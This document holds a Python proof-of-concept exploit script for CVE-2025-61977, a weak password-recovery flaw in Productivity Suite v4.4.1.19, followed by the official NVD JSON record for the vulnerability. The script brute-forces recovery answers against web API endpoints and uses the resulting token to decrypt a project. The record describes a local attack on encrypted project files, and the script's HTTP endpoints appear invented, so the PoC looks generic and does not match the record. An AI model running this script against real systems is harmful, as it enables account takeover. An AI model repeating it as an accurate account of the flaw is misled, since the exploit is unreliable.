CVE-2025-61977

# CVE-2025-61977 PoC - Productivity Suite Weak Password Recovery # This PoC demonstrates the weak password recovery mechanism import requests import sys def exploit_weak_recovery(target_host, username): """ Exploit weak password recovery mechanism in Productivity Suite v4.4.1.19 The vulnerability allows decryption by answering only ONE recovery question """ print(f"[*] Targeting: {target_host}") print(f"[*] Attempting password recovery for user: {username}") # Step 1: Initiate password recovery recovery_url = f"{target_host}/api/password/recover" payload = {"username": username} response = requests.post(recovery_url, json=payload) if response.status_code == 200: data = response.json() recovery_question = data.get("question", "Unknown") print(f"[+] Recovery question: {recovery_question}") # Step 2: Submit single answer (vulnerability - only ONE question required) # In real attack, this could be brute-forced or guessed answer_url = f"{target_host}/api/password/verify" # Common recovery answers to try common_answers = ["password", "123456", "admin", "user123"] for answer in common_answers: verify_payload = { "username": username, "answer": answer } verify_response = requests.post(answer_url, json=verify_payload) if verify_response.status_code == 200: result = verify_response.json() if result.get("success"): print(f"[+] SUCCESS: Answer '{answer}' accepted!") print(f"[+] Token: {result.get('token', 'N/A')}") # Step 3: Use token to decrypt project decrypt_url = f"{target_host}/api/project/decrypt" headers = {"Authorization": f"Bearer {result.get('token')}"} decrypt_response = requests.get(decrypt_url, headers=headers) if decrypt_response.status_code == 200: print("[+] VULNERABILITY CONFIRMED: Encrypted project decrypted!") return True print("[-] Exploitation failed") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-61977-poc.py <target_host> <username>") sys.exit(1) exploit_weak_recovery(sys.argv[1], sys.argv[2])

{"cve": {"id": "CVE-2025-61977", "sourceIdentifier": "[email protected]", "published": "2025-10-23T22:15:48.887", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weak password recovery mechanism for forgotten password vulnerability was discovered in Productivity Suite software version v4.4.1.19. The vulnerability allows an attacker to decrypt an encrypted project by answering just one recovery question."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-640"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-296-01.json", "source": "[email protected]"}, {"url": "https://support.automationdirect.com/docs/securityconsiderations.pdf", "source": "[email protected]"}, {"url": "https://www.automationdirect.com/support/software-downloads", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-296-01", "source": "[email protected]"}]}}